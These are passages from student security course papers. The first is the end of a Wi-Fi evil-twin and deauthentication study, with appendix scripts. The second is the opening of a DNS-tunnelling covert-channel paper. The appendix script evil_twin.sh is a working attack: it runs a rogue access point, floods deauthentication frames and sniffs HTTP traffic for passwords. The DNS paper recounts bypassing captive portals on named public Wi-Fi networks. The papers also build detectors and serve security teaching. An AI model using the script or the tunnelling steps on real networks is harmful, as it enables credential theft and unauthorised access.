is above the threshold specified by the user, we
5.3 Integrity check of management print out a warning.
frames The way we distinguish deauthentication frames from
As have been implemented, we are able to easily spoof other types of frames is by the frame type and subtype:
either the AP or the client's MAC address and send management frames are of type 0, and further,
deauthentication frame on their behalf, even if the network deauthentication frames are of subtype 12. See Appendix
is encrypted with a key unknown to the attacker. The flaw V for the list of types and subtypes of IEEE 802.11 frames.
lies in the fact that management frames are unencrypted. Note that it is somewhat difficult to determine exactly the
What can be done to prevent deauthentication attack is rate beyond which we recognize deauthentication attack is
simple: make the Wi-Fi network encrypted if not already in place and below which we assume order. This is
so, and protect the management frames in addition to the because deauthentication frames are a part of the
data frames so that we can enforce their confidentiality as legitimate network protocol which are sent back and forth
well as authenticity. This way, it is difficult, if not between two authentic machines. Here, our goal is to
impossible, for an attacker to impersonate the clients or demonstrate the feasibility of detecting deauthentication
the AP since the attacker will have to know the shared key frames, and thus such a complication is simplified by
established between them to pass the integrity check. allowing the user to specify the rate.

In 2009, a new protocol that augments this feature to the 6.2 Detection of Evil Twin attack
existing Wi-Fi protocol was officially released, named In the bash script evil_twin_detect.sh provided in
802.11w [7]. This protects not only the data frames but appendix III, we implemented the defence mechanisms
also the management frames such as deauthentication, and described in section 5.2. This script can be run on the
thus is immune to such attacks from outside. computer of a client while he is connected to the internet
and a soon as an evil twin attack is detected, the client is
5.4 Security at Higher Layers informed by a notification. This program lists all the APs
If the Wi-Fi protocol, which operates at both the physical with the same ESSIDs as that of the AP the client is
and data link layer, fails to provide the security connected to. It checks that no two of those share the same
requirements it is possible to rely on higher layers. As an BSSID and that all are in the client’s whitelist. If one of
example it is now common practice to use the HTTPS these conditions is not met a notification is sent to inform
protocol (application layer) in order to secure connection the client of a possible ongoing attack. The whitelist is a
to websites. Although HTTPS is not itself free from any text file named authorised.list (a sample is provided in
vulnerability, such as SSL strip for example. Furthermore, appendix IV) which must follow the following format : the
even if appropriate security measures at higher layers may first line consists of an integer X denoting the number of
prevent a MiTM from reading, tampering or replaying the different whitelisted ESSIDs. This line is followed by X
packets the attacker could still block some or all of them. blocks. Each one begins with the ESSID on the first line,
then an integer Y denoting the number of accepted
6. IMPLEMENTATION OF BSSIDs, followed by the Y BSSIDs each on a new line.
SELECTED COUNTERMEASURES
In the following sections we will describe our own
7. CONCLUSION
In this paper, we have implemented a Man-In-The-Middle
implementations of two of the countermeasures described
attack on both Open Wi-Fi and WPA/WPA2-PSK
in section 5.
protected Wi-Fi. This was done by setting up an Evil Twin
AP and broadcasting deauthentication frames in the target
6.1 Detection of Deauthentication
network to kick current users off from the network.
We have used the following tools to implement a proof-
Following which, the users’ devices will automatically
of-concept deauthentication detection program,
reconnect to the Evil Twin AP which will grant us the
detect_deauth.py.
Man-In-The-Middle position. Finally, we have also
- Python 2.7 with scapy library, on Ubuntu Linux proposed and implemented two countermeasures. The
- Wi-Fi dongle (for monitor interface) first method detects suspicious deauthentication frames
and the second method detects Evil Twin Access Points.

gp09
PDFsam_merge 69
73
In conclusion, we have proven how unsecure Open Wi-Fi
networks and WPA/WPA2-PSK networks are and that it
is easy for a malicious user to perform all manners of
MiTM attacks on these networks once he is in position.

8. ACKNOWLEDGEMENTS
We would like to thank Professor Hugh Anderson for his
guidance and advice during the entirety of this project. We
would also like to thank him for loaning us the necessary
equipment that were vital in completing this project.

9. REFERENCES
[1] Aircrack-ng. 2017. Aircrack-ng’s website.
Retrieved November 6, 2017 from
https://www.aircrack-ng.org/

[2] Darkaudax. 2014. Tutorial : Is My Wireless


Card Compatible? Retrieved November 9,
2017 from https://www.aircrack-
ng.org/doku.php?id=compatible_cards

[3] Info-communications Media Development


Authority. 2017. Wireless@SG Hotspot List.
Retrieved October 23, 2017 from
https://www.imda.gov.sg/~/media/imda/files/c
ommunity/consumer%20education/wirelless%
20sg/hotspot%20list1.pdf

[4] Oblique. 2013. Create_ap’s GitHub project.


Retrieved November 6, 2017 from
https://github.com/oblique/create_ap

[5] Frank Piessens and Mathy Vanhoef. 2014.


Advanced Wi-Fi Attacks Using Commodity
Hardware. Retrieved November 9, 2017 from
https://people.cs.kuleuven.be/~mathy.vanhoef/
papers/acsac2014.pdf

[6] Frank Piessens and Mathy Vanhoef. 2017. Key


Reinstallation Attacks: Forcing Nonce Reuse
in WPA2. Retrieved November 9, 2017 from
https://papers.mathyvanhoef.com/ccs2017.pdf

[7] IEEE. 2009. 802.11w Protected Management


Frames. Retrieved November 12, 2017 from
http://grouper.ieee.org/groups/802/11/Reports/t
gw_update.htm

gp09
PDFsam_merge 70
74
10. APPENDIX
The code is also available at :
https://github.com/CS3235-project/wifi-spoofing

I. EVIL_TWIN.SH
1. #!/bin/bash
2. echo "Enter interface for monitoring/injection"
3. read interface_deauth
4. echo "Enter interface for rogue AP"
5. read interface_ap
6. echo "Enter faceing interface"
7. read interface_faceing
8. echo "Enter Wi-Fi type 1: Open, 2: WPA/WPA2 PSK"
9. read wifitype
10.
11. if [ $wifitype = 2 ]
12. then
13. echo "Please enter the passphrase"
14. read -s passphrase
15.
16. fi
17. echo "Setting up interfaces, this might take while"
18.
19. ifconfig ${interface_deauth} down
20. iwconfig ${interface_deauth} mode managed
21. ifconfig ${interface_deauth} up
22. sleep 5s
23. ifconfig ${interface_ap} down
24. iwconfig ${interface_ap} mode managed
25. ifconfig ${interface_ap} up
26. sleep 5s
27.
28.
29. #shows a list of the neighbooring AP's
30. iwlist ${interface_deauth} scan | grep "ESSID"
31.
32. echo "Enter the ESSID of the target AP"
33. read essid
34.
35. #stores in an array information about AP's with the given ESSID (MAC Address, channel, ESSI
D)
36. array=( $(sudo iwlist ${interface_deauth} scan | grep "Address\|Channel:\|ESSID:" | grep -
B 2 "${essid}") )
37.
38. #variable used keep track of the index of the array
39. count=0
40.
41. echo "Do you really want to attack ${essid} Yes/No ?"
42. read response
43.
44. if [ $response = Yes ]
45. then
46. echo "Attack launched"
47. if [ $wifitype = 1 ]
48. then
49. #a rogue AP with the target ESSID is created
50. xterm -hold -e create_ap ${interface_ap} ${interface_faceing} "${essid}" &
51. sleep 5s
52. echo " Wireless Network ${essid} created"
53.
54. fi
55.
56. if [ $wifitype = 2 ]
57. then

gp09
PDFsam_merge 71
75
58. xterm -hold -
e create_ap ${interface_ap} ${interface_faceing} "${essid}" ${passphrase} &
59. sleep 5s
60. echo "Wireless Network ${essid} created"
61.
62. fi
63.
64.
65. #puts the deauthing interface into monitor mode, necessary for injecting dauthenticatio
n frames
66. ifconfig ${interface_deauth} down
67. iwconfig ${interface_deauth} mode monitor
68. ifconfig ${interface_deauth} up
69.
70. #a deauthentication attack is launched against every AP with the target ESSID
71. for i in "${array[@]}"
72. do
73. #these magic constants (%8, -
eq 4) are designed to extract the required information from the grep output
74. if [ $(($count%8)) -eq 4 ]
75. then
76. #stores the target AP's MAC address
77. address=$i
78. fi
79. if [ $(($count%8)) -eq 5 ]
80. then
81. #stores the target AP0s channel
82. channel="${i//[!0-9]/}"
83.
84. #switches the channel of the deauthing interface to the target AP's channel
85. iwconfig ${interface_deauth} channel ${channel}
86.
87. #deauthenticate users connected to the target AP
88. (xterm -hold -e aireplay-ng -0 15 -a ${address} ${interface_deauth} &)
89. fi
90. ((++count))
91. done
92. fi
93.
94. xterm -hold -e "tcpdump -i ${interface_ap} port http -l -A | egrep -
i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username
:|password:|login:|pass |user ' --color=auto --line-buffered -B20" &

II. DEAUTH_DETECT.PY
1. #!/usr/bin/env python
2.
3. """ execute with root permission
4. let wlan1 be the interface used for monitoring. Then either
5. 1. Use airmon-ng wlan1 start
6. to set up interface named mon0
7. 2. Do manually:
8. ifconfig wlan1 down
9. iwconfig wlan1 mode monitor
10. iwconfig wlan1 channel (set to whichever channel the AP is in)
11. ifconfig wlan1 up
12.
13. Make sure that the channel in which your AP is active and the channel your monitoring inter
face
14. is in are the same.
15. """
16.
17. import sys
18. import socket
19. import time
20. import string

gp09
PDFsam_merge 72
76
21. from scapy.all import *
22.
23. # global variables such that they are accessible from the event handler
24. target_mac = None # must be lowercase
25. target_essid = None
26. deauth_count = 0
27. last_time_deauth_received = 0
28. threshold = 0
29.
30. def sniff_req(packet):
31. """ event handler for scapy's sniff method
32. the argument is the packet received
33. """
34. ## DEBUG-MODE
35. # if packet.haslayer(Dot11):
36. # print packet.sprintf("packet from AP [%Dot11.addr2%] to Client [%Dot11.addr1%]")

37.
38. # look for a deauth packet
39. if packet.haslayer(Dot11Deauth):
40. global deauth_count, last_time_deauth_received
41. if True: # just to avoid changing indentation
42. current_time = time.time()
43. if current_time - last_time_deauth_received > 60:
44. last_time_deauth_received = current_time
45. deauth_count = 0
46. deauth_count += 1
47. print packet.sprintf("Deauth from AP [%Dot11.addr2%] to Client [%Dot11.addr1%],
\
48. Reason [%Dot11Deauth.reason%]")
49. print 'count/min = %d' % (deauth_count)
50.
51. def info(fm):
52. if fm.haslayer(Dot11):
53. if ((fm.type == 0) & (fm.subtype==8)):
54. captured_essid = str(fm.info).strip()
55. captured_essid = string.lower(captured_essid)
56. # print captured_essid #uncomment this line to check if scanning properly
57. global target_essid
58. if captured_essid == target_essid:
59. global target_mac
60. target_mac = fm.addr2
61.
62. def is_mac_found(p):
63. """ function that is supposed to be passed to sniff() to terminate sniffing
64. """
65. global target_mac
66. return target_mac != None
67.
68. def find_mac_from_essid(interface):
69. """ converts ESSID to MAC address. Timeout is set to 4
70. """
71. sniff(iface=interface,prn=info, timeout=4)
72.
73. def main():
74. """ main function
75. """
76. if len(sys.argv) < 4:
77. print 'Wrong command arguments'
78. print '1. specify your interface used for monitoring'
79. print '2. specify the network to monitor'
80. print '3. specify the deauth frame count limit per min'
81. print 'for example:\n ' + sys.argv[0] + ' mon0 myWifi 40'
82. sys.exit()
83.
84. global target_mac, threshold, last_time_deauth_received, target_essid

gp09
PDFsam_merge 73
77
85.
86. interface = sys.argv[1]
87. target_essid = sys.argv[2]
88. threshold = sys.argv[3]
89.
90. print 'scanning for the MAC address of %s' % (target_essid)
91. find_mac_from_essid(interface=interface)
92. if target_mac is None:
93. print 'corresponding mac address was not found.'
94. print 'is the network up?'
95. sys.exit()
96.
97. target_mac = string.lower(target_mac)
98.
99. last_time_deauth_received = time.time()
100. # Berkeley Packet Filter format
101. filter_statement = "ether src " + target_mac
102.
103. print 'now monitoring ESSID(%s) with BSSID(%s) on interface %s' % (target_essid
, target_mac, interface)
104. sniff(filter=filter_statement, iface=interface, prn=sniff_req)
105. # sniff(iface=interface, prn=sniff_req) # uncomment this line to test that the
filter is working
106.
107. if __name__ == '__main__':
108. main()

III. EVIL_TWIN_DETECT.SH
1. #!/bin/bash
2.
3. #basic version of a defence program against hotspot spoofing
4. #given some preferred essid and MAC, if another MAC with the same SSID exists
5. #a notification warns the user
6.
7. echo "Enter scanning interface"
8. read interface
9. mapfile -t myArray < authorised.list
10. while true
11. do
12. index=1
13. for j in $(seq 0 $((myArray[0]-1)))
14. do
15. count=0
16. SSID=${myArray[index]}
17. ((++index))
18. connectedSSID=$(iwgetid -r)
19. array=( $(iwlist ${interface} scan | grep Address ) )
20. connectedMAC=${array[4]}
21. nbAuthorisedMacs=${myArray[index]}
22. ((++index))
23. if [ "$SSID" == "$connectedSSID" ]
24. then
25. array=( $(sudo iwlist ${interface} scan | grep 'Address\|ESSID:' | grep -
B 1 "\"${SSID}\"") )
26. sameMac=0
27. for i in "${array[@]}"
28. do
29. if [ $((count%7)) -eq 4 ]
30. then
31. #echo "${i}"
32. #echo "${connectedMAC}"
33. if [ "${connectedMAC}" == "$i" ]
34. then
35. ((++sameMac))

gp09
PDFsam_merge 74
78
36. fi
37. problem="YES"
38. for k in $(seq $index $((index+nbAuthorisedMacs-1)))
39. do
40. if [ "${myArray[k]}" == "$i" ]
41. then
42. problem="NO"
43. fi
44. done
45. if [ "$problem" != "NO" ] && [ "${i}" != "ESSID:\"$SSID\"" ]
46. then
47. notify-send "Warning, wifi ${SSID} may be compromised"
48. echo "Warning, unexpeced MAC : ${i}"
49. fi
50. fi
51. ((++count))
52. done
53. if [ "$sameMac" != "1" ]
54. then
55. notify-send "Warning, wifi ${SSID} may be compromised"
56. echo "Warning, there are ${sameMac} AP with identical MAC"
57. fi
58. fi
59. index=$((index+nbAuthorisedMacs))
60. done
61. done

IV. WHITE.LIST
1. 2
2. NUS
3. 2
4. 88:F0:31:8D:21:CF
5. A8:9D:21:F3:70:8F
6. NUSOPEN
7. 1
8. 58:2A:F7:9E:45:A4
9.

gp09
PDFsam_merge 75
79
V. TYPES AND SUBTYPES OF IEEE
802.11 MANAGEMENT FRAMES

gp09
PDFsam_merge 76
80
Exploiting DNS Protocol as a Covert Channel
Amarparkash Singh Mavi Chua Lin Jing Chu Ying Yu
School of Computing School of Computing School of Computing
National University of Singapore National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417 Singapore 117417
a0123935@u.nus.edu a0131188@u.nus.edu e0002358
Hou Ruomu Joelle Lim Yan Yi
School of Computing School of Computing
National University of Singapore National University of Singapore
13 Computing Drive 13 Computing Drive
Singapore 117417 Singapore 117417
a0131421@u.nus.edu a0127032@u.nus.edu

ABSTRACT In this paper, we provide an analysis of how the DNS protocol


In this paper, we analyse how the Domain Name System (DNS) can be exploited and used as a carrier for covert channel
protocol can be exploited and used as a carrier for covert channel communication in the context of DNS Tunneling. The discussion
communication in the context of DNS Tunneling. We have is structured as follows.
performed a case study on one of the state-of-the-art DNS
Tunneling tools, Iodine to determine the current approaches that In section 2, we provide a background of key topics relevant to
have been utilised in exploiting the protocol and subsequently the project, namely covert channel, DNS protocol and DNS
examined the prevalence of the phenomenon empirically through Tunneling in order to facilitate the discussion in subsequent
a set of experimental trials. In general, the approach has been sections. Subsequently, in section 3, we perform a case study on
centered on manipulating resource records of DNS messages and one of the state-of-the-art DNS Tunneling tools, Iodine and
therefore, we implemented a proof of concept to explore how discuss the experimental trials conducted using Iodine to
other elements such as the Time-to-Live (TTL) field could be empirically examine the prevalence of the phenomenon.
manipulated to establish a covert channel, thereby bypassing Following this, in section 4, we provide an overview of the
firewalls. We conclude with a comparative analysis between the current defenses and the motivation for exploring the TTL field as
traditional use of resource records and the use of TTL field in a viable covert carrier in DNS Tunneling. In section 5, we detail
DNS Tunneling. the implementation of our proof of concept that successfully
utilises the TTL field as a covert carrier in DNS Tunneling. In the
last section, we provide an evaluation of the differences between
Categories and Subject Descriptors the traditional use of resource records and the use of the TTL field
[Network Security]: Web Protocol Security in DNS Tunneling based on a self-defined set of criteria.

General Terms 2. BACKGROUND


Security In this section, we provide the necessary background description
and explanation of the key topics relevant to the project in order
Keywords to facilitate the discussion in subsequent sections.
Covert Channel, Domain Name System (DNS), Resource Record,
Time-to-Live (TTL) Field, DNS Tunneling.
2.1 Covert Channel
A covert channel is essentially a communication channel that is
exploited for an unauthorised exchange of information, thereby
1. INTRODUCTION violating the security policy of a system [1]. There exist multiple
Fuelled by the motivation to bypass paying for Wi-Fi at airports, classifications of covert channels and a specific type of covert
people have found ways to exploit the DNS protocol which channel that we are examining is a network-based covert channel.
allowed them to surf the web for free. Since then, there has been a Network-based covert channels are channels that employ network
greater motivation for exploiting the DNS protocol with protocols as carriers of communication. It usually involves
objectives that include the exfiltration of confidential data from utilizing the protocol in a manner that it is not intended for. In our
enterprises by setting up a covert channel between the infected case, the network protocol being exploited is DNS with the
computer and a fake DNS server. Such an attack is classified as specific attack type being DNS Tunneling.
DNS Tunneling which essentially utilises fields within DNS
messages as covert carriers for tunneling data. 2.2 DNS Protocol
DNS is the protocol responsible for translating human-readable
domain names into IP addresses that the network protocol

gp10
PDFsam_merge 77
81
recognises. The motivation for DNS was really to bridge the gap Table 1. Table of Common Resource Record Types
between the language that the computer understands and the Resource Record Type Associated Information
language that we humans understand. Computers identify entities
A IPv4 address
on the network using IP addresses. However, it is counter-
CNAME Alias of domain name
intuitive for us humans to identify websites or hosts in general,
NS Domain name of authoritative
using their IP addresses. That explains the need for a mapping in
name server
the form of DNS. It is one of the hugely significant protocols that
we unknowingly utilise countless times on a daily basis. It takes MX Domain name of mail server
effect whenever we enter a website URL into the browser. This TXT Any text
action prompts a DNS query to resolve the website’s IP address.
This IP address essentially identifies the web server that is There are generally two ways in which a client can use DNS to
subsequently queried with a HTTP request to serve the webpage. resolve a domain name to an IP address. The first method involves
By default, DNS utilises port 53 for its service. a non-recursive query. In this case, the client contacts the DNS
servers individually until it locates the authoritative name server
that contains the queried domain name. The other method
involves a recursive query where the client simply transmits a
query that requests for the IP address of the queried domain name
and in return, it expects a response that contains the resolved IP
address of the domain name [4]. Recursive queries are essentially
the most common form of DNS queries. In this case, the query is
directed to a recursive name server that resolves the FQDN on
behalf of the client through an iterative process [9].

Figure 1. Hierarchical Structure of DNS Domain Namespace

DNS is essentially implemented as a hierarchical and distributed


database [2] to facilitate scalable management of the extensive
number of registered domain names that continues to grow
rapidly. This actually gives rise to a tree structure identified as the
domain namespace (as shown in figure 1 [2]) which provides the
basis for uniquely identifying a host based on a given domain
name. For instance, as shown in figure 1, the domain name
mydomain.microsoft.com comprises different labels that are Figure 2. Domain Name Resolution through Recursive Query
separated by dots where each label corresponds to a level within
the namespace hierarchy. Through the specified labels, it allows Figure 2 [9] provides a simplified illustration of how a domain
the host to be uniquely identified by traversing the corresponding name is resolved through a recursive name server. It can be seen
path in the hierarchy. The domain name mydomain.microsoft.com that the client essentially transmits a DNS query to the recursive
is also identified as the fully qualified domain name (FQDN). A name server that requests for the A resource record of the
FQDN is a domain name that comprises a hostname and a domain specified domain name, www.inria.fr. The recursive name server
[9]. In this context, the hostname would be mydomain while the then iteratively queries the various domain levels of the domain
domain is microsoft.com. Essentially, the domain name that a name in order to resolve it [9]. It starts off with a query to a root
client would request to resolve using DNS would be a FQDN. server to determine the authoritative name server of the domain
name fr by requesting for the corresponding NS resource record.
In order to facilitate the unique identification of a host and the It then repeats this iteratively until it gets contact with the
corresponding resolution of its IP address, there are key fields authoritative name server of inria.fr (dns.cs.wisc.edu) where it
present in a DNS message that are classified as resource records. transmits a query to resolve the FQDN (www.inria.fr) which is
Each resource record type provides corresponding information for similar to the query initiated by the client to the recursive name
a domain name. Such information of a domain name is queried server. Once this is determined, the response is then forwarded to
using DNS queries that have to specify the type of information the client and the resolution process is complete.
requested in terms of the resource record type, along with the
domain name [9]. Table 1 shows some of the common resource In general, caching is implemented in recursive name servers to
record types along with the associated information they provide. store resource records of domain names for a specified time
Each resource record also has a corresponding TTL field period corresponding to the value of the TTL field [6]. This is
associated with it that specifies the validity of the record [3]. done so as to prevent frequent forward lookups as illustrated in
figure 2 and therefore, optimise the efficiency of the protocol.

gp10
PDFsam_merge 78
82
2.3 DNS Tunneling probing mechanism for discovering the best available resource
DNS Tunneling is an attack type that exploits the DNS protocol record type for transmission. Iodine would first attempt to use
as a covert channel by encoding data within DNS messages. It resource records with higher bandwidth, such as NULL and
essentially exploits the fact that communication on port 53 with PRIVATE before testing lower bandwidth options such as A and
the local DNS server is not filtered on most networks. The reason CNAME [5]. This serves to ensure that users are able to achieve
for this common negligence is because DNS is essentially not the best possible throughput between the server and the client.
perceived as a protocol that facilitates data transfer [6] but rather
as a primary supporting protocol that is needed before any
3.2 Experimental Trials
As mentioned in section 2.3, one of the main reasons why DNS
communication can be initiated using other protocols such as
Tunneling can be successfully performed is due to the fact that
HTTP. As such, it is a protocol that is generally overlooked from
communication with the local DNS server on port 53 is often
a security viewpoint and allowed by firewalls [9]. The situation is
unmonitored in wireless networks. This essentially includes
further compounded by the fact that networks usually implement
enterprise networks where the objectives of DNS Tunneling can
recursive queries where the local DNS server acts as a recursive
be relatively more malicious. As such, we realized that the issue
DNS server. As such, this leaves significant room for the protocol
of greater significance is the prevalence of this security flaw
to be exploited as a covert channel. In the case of an enterprise, an
where communication with the local DNS server is often not
attacker with access to an internal machine on the local network
filtered.
can essentially tunnel confidential data over DNS to a domain that
he controls. This could facilitate data exfiltration or in general,
In order to examine how prevalent this security flaw is, we
tunneling of any internet protocol (IP) traffic [6] which even
decided to conduct some experimental trials for key public
allows casual users to leverage this for internet surfing in open
wireless networks in Singapore. This comprised one of
Wi-Fi networks, something that we would further elaborate upon
Singapore’s largest public Wi-Fi services, Wireless@SG, NUS’s
as part of our experimental trials in section 3.2.
public Wi-Fi, NUSOPEN and the Wi-Fi at a fast food restaurant,
Pizza Hut. These networks are essentially open Wi-Fi networks
The fields typically exploited in DNS Tunneling are resource
where credentials are required before access can be granted for
records as highlighted in the previous section. These fields are
surfing the internet as shown respectively in figures 3, 4 and 5.
essentially utilised as covert carriers for tunneling data over DNS.
However, as we would demonstrate in a later section, an
alternative to resource records would be TTL fields that can also
be employed as covert carriers. The motivation for this has to do
largely with current defenses such as semantic analysis which
particularly target the exploitation of resource records.

3. CASE STUDY OVERVIEW


In this section, we will perform an analysis of a state-of-the-art
DNS Tunneling tool, Iodine in terms of how it is designed to be
utilized for DNS Tunneling. Subsequently, we will also detail a
set of experimental trials conducted using Iodine to examine the
prevalence of the phenomenon.

3.1 Analysis of Iodine


Iodine is a popular open source software used to set up DNS Figure 3. Wireless@SG Login Page
Tunneling between a server and a client. In order to run Iodine, a
user must first own a domain and also set up an authoritative
name server for the domain. In short, DNS requests for a
subdomain such as tunnel.example.com should be directed to
ns.example.com, its authoritative name server which is controlled
by the user. On this authoritative name server, the Iodine server
would be running and ready to respond to DNS requests sent out
by the client. On the other hand, the client would be running the
Iodine client and firing DNS requests to the server. This exchange
is done entirely through port 53, a port which is seldom filtered by
system administrators as mentioned in earlier sections.

Iodine uses nearly all the fields (except for the TTL field) in DNS
queries and responses to transmit information, which makes it an
extremely flexible DNS Tunneling tool. It also uses a variety of
codecs to fit different situations in the transmission. More Figure 4. NUSOPEN Login Page
information can be found in the Iodine documentation, under
operational information [5].

Since the authoritative name server is able to return DNS


responses of any resource record type, Iodine implements an auto-

gp10
PDFsam_merge 79
83
be a webpage displayed requesting for credentials before granting
access to the internet as shown respectively in figures 3, 4 and 5.
We then ran the iodine client and SSH tunnel. Following this, if
we did a curl to a website URL, we would be able to surf the
internet without having to provide any credentials to the displayed
webpage. Figure 7 shows that we were successfully able to curl to
the website hugh.comp.nus.edu.sg and fetch information. This
implied that we had successfully bypassed the authentication and
gained access to the internet.

Figure 5. Pizza Hut Login Page

However, they are still able to serve DNS queries because


communication to the local DNS server is not blocked. The reason
is due to the way the network architecture is implemented where
only HTTP traffic to the internet is blocked so that users cannot
surf the internet without providing valid credentials but DNS
traffic is still allowed since the web page that requests the
credentials needs to be served. As such, the aim of the
experimental trials is to show that since communication with the
DNS server is not filtered, a user would be able to bypass the
authentication and surf the internet successfully with the aid of Figure 7. Successful Access to Website
DNS Tunneling. We leveraged Iodine as the DNS Tunneling tool
in our experimental trials which showed that Iodine worked The results of the experimental trials serve to reinforce the
successfully on these networks. observation that port 53 is generally not filtered in wireless
networks. While the objective of DNS Tunneling in these trials
The following details the steps we took to perform the were less malicious as it only involved surfing the internet without
experimental trials. having to provide any credentials, the implications of the security
flaw are significant particularly in the context of enterprise
For Iodine to work, we first needed to set up a domain name networks. That is because, in such networks, there is a greater
server as mentioned in the previous section. For our trials, we motivation to leverage DNS Tunneling for purposes such as data
created a domain www.cs3235.tk. Next, we created an EC2 exfiltration or in general, the tunneling of any IP traffic which
instance through Amazon Web services and tied our domain to could lead to more damaging consequences.
that instance using Route 53. After setting up the server, we
configured the Iodine server code to run in the background.
4. OVERVIEW OF CURRENT DEFENSES
While the experimental trials seem to suggest that the DNS
Subsequently, we compiled and ran the Iodine client on our
protocol is easily exploitable in the context of DNS Tunneling, it
personal machines. We then had to set up a SSH tunnel within the
is not something completely unknown to the security community.
DNS tunnel (as shown in figure 6) which acted as a SOCKS
There have been defenses derived that deal with the exploitation
proxy for directing the network traffic.
of the DNS protocol in general and therefore, are applicable to
DNS Tunneling. These include semantic analysis, traffic analysis
and the use of DNS blacklists/whitelists. A brief overview of the
defenses are provided as follows.

Semantic Analysis. The idea of semantic analysis is to analyse


specific resource records in DNS responses and filter out those
that are not semantically valid or contain excessive redundant
information. For instance, the TXT field in DNS responses are
usually monitored with care. That is because, the TXT field can
be used to store any text. This implies that an attacker can even
store malicious code into TXT fields. As a result, when a user
requests for DNS services, the malicious code will be able to pass
through the firewall and get stored into the user’s device.
Figure 6. Running Iodine Client and Setting Up SSH Tunnel Therefore, by detecting that the TXT field is being stored
frequently, the system can identify the malicious DNS server and
Following this, the set-up was completed which implied that eventually block it [10]. In this regard, one of the alternative
internet traffic was now being directed through port 53 instead of actions that is commonly adopted by system administrators is to
the usual port 80. As mentioned earlier, by default, there would block the use of the TXT resource record in DNS responses.

gp10
PDFsam_merge 80
84
Figure 8 illustrates some example outcomes as a result of incorporating the use of DNS blacklists/whitelists as a defensive
incorporating semantic analysis as a defensive technique against technique against DNS Tunneling.
DNS Tunneling.

Figure 10. Example Outcomes from the Use of DNS


Blacklists/Whitelists

Figure 8. Example Outcomes from Semantic Analysis


While these defenses seem to be comprehensive, there still exists
ways to defeat them particularly for the case of semantic analysis.
Traffic Analysis. Network traffic can be monitored in terms of As highlighted earlier, system administrators who are familiar
the frequency of DNS queries that originate from a specific host with the dangers of DNS Tunneling are likely to monitor and
or are sent to a specific domain. A high frequency of DNS queries inspect specific resource records of DNS responses. However, this
would suggest a high likelihood of protocol misuse. The reason is actually overlooks an alternative element that can be exploited as
because, most situations that involve DNS Tunneling would a covert carrier and that is the TTL field. As such, we explored the
require a high frequency of DNS queries to accomplish the possibility of transmitting information using the TTL field of DNS
objective. For instance, in the context of the experimental trials responses. Since the TTL field is a relatively unknown vector for
that were conducted for the open Wi-Fi networks, the objective of transmitting messages, it is an unconventional medium that
DNS Tunneling was to facilitate surfing of the internet. As such, facilitates DNS Tunneling. In the subsequent section, we would
this would likely involve a high exchange of DNS queries and discuss the implementation of our proof of concept that
responses to facilitate the tunneling. Figure 9 illustrates some successfully utilises the TTL field in DNS Tunnelling.
example outcomes as a result of incorporating traffic analysis as a
defensive technique against DNS Tunneling.
5. IMPLEMENTATION DETAILS
In this section, we shall discuss the details of our proof of concept
that employs the TTL field as a covert carrier in DNS Tunneling.

TTL field is a data field in the DNS answer section which


specifies how long the answer to the DNS query is valid. This is
usually used by DNS caches to determine how long they should
cache the DNS response before querying the authoritative name
server again. Since the TTL field is a 4-byte data field, its
theoretical upper limit is 232-1. However, most DNS caches use an
upper limit of 86400 (1 day) seconds in practice.

For the server side, we obtained a domain name and also set up an
authoritative name server for the domain. As seen in figure 11,
Figure 9. Example Outcomes from Traffic Analysis any DNS query for tunnel.pixelect.me would be directed to its
authoritative name server ns.pixelect.me. The glue record for
ns.pixelect.me ensures that the DNS query is forwarded to a
DNS Blacklists/Whitelists. In the case of DNS blacklists or
machine which is running a modified DNS server under our
whitelists, it involves a more aggressive defensive approach where
control.
the decision to grant access to a particular domain is decided with
the aid of a database [8]. In the case of a DNS blacklist, it would
contain domain names for which access would be blocked while
for a DNS whitelist, it would contain trusted domain names for
which access would be permitted. The network administrator
could choose to incorporate either of the two lists or even both.
Figure 10 illustrates some example outcomes as a result of

gp10
PDFsam_merge 81
85
Table 2. Summary of Comparative Analysis

Resource Records TTL

Exploitation Relatively Easy Slightly more


Figure 11. DNS Resource Records Ease complicated to deal
with DNS caches and
We referenced an open source codebase [7] and modified it to transmission delays
build a DNS server in Python. We modified the existing codebase
to first encode each character in a secret string to its equivalent Information Up to about ⅔ the size ~3 bytes per answer
ASCII value. Whenever the DNS server is queried, we would Bandwidth of the UDP packets
store part of the secret string into the TTL field. The DNS server
would then loopback and repeat the sequence of TTL values Covertness Low Very High
continually until the secret string is changed to another message.
Defenses A bunch of known Only traffic analysis
On the client side, we are running a Java program which would defenses including and black/white list
continually send DNS queries for tunnel.pixelect.me. It would semantic analysis, are effective defenses
then parse the TTL value in each DNS response to retrieve the traffic analysis and
encoded message. black/white list

In order to embed information in the TTL field, there were two


complications that we had to address before the embedding Exploitation Ease. In general, DNS resource record types such as
scheme could be rendered useful. Firstly, due to processing NULL, TXT, CNAME, MX and A can be used to embed
overheads and transmission delays experienced in the network, it information in responses. For instance, a CNAME record for a
is highly likely that the TTL value received by the client is lower query www.nus.edu.sg could be of the form sg-1.web.nus.edu.sg.
than the actual TTL value sent out by the DNS server. Secondly, An example that illustrates the exploitation of this field would be
if the TTL value is larger than 86400, it could be changed to a encoding the message payload-here as payload-here.nus.edu.sg in
value below 86400 by intermediate DNS caches. the answer field. Other resource records can generally be
exploited in similar fashion. However, complications do exist in
To resolve the first complication, we set the last byte of the TTL using such encoding. That is because the resource records may not
field to “0xFF” (the maximum value) by default. As a result, as allow every possible byte to appear in the data. As an example,
long as the total transmission delay is less than 255 seconds (a the most prevalent DNS servers and caches only allow ascii bytes
reasonable assumption), we can ensure that the first three bytes of corresponding to lower-case letters, digits and a small set of
the TTL value is unaltered by intermediate DNS caches and can symbols such as dot and hash. To exploit such a channel, the
be used to transmit information reliably. For the second encoder will need to transform all the possible byte symbols to a
complication, we first attempt to use all four bytes in representation using a smaller symbol set. On the other hand, the
transmission. If it is not possible, we would downgrade to use usage is further limited for the TTL field due to the existence of
only the last two bytes (capped at 65535) for transmission. DNS caches in the network. Although the theoretical limit of the
TTL field is 4 bytes long, most of the DNS caches accept a
As a result of the identified complications, only one to three bytes maximum value of 86400 which is only slightly larger than 2
of information can be viably transmitted in each DNS packet. bytes. Moreover, as the TTL field is used to represent the time-to-
While the overhead of using the TTL field to transmit information live of a resource record, the value will decrease along with
is high, there could still be motivation for an attacker to exploit transmission due to the inherent delay. As such, when the field is
this method because it renders one of the common defenses, used, an attacker will need to engineer the value a little to ensure
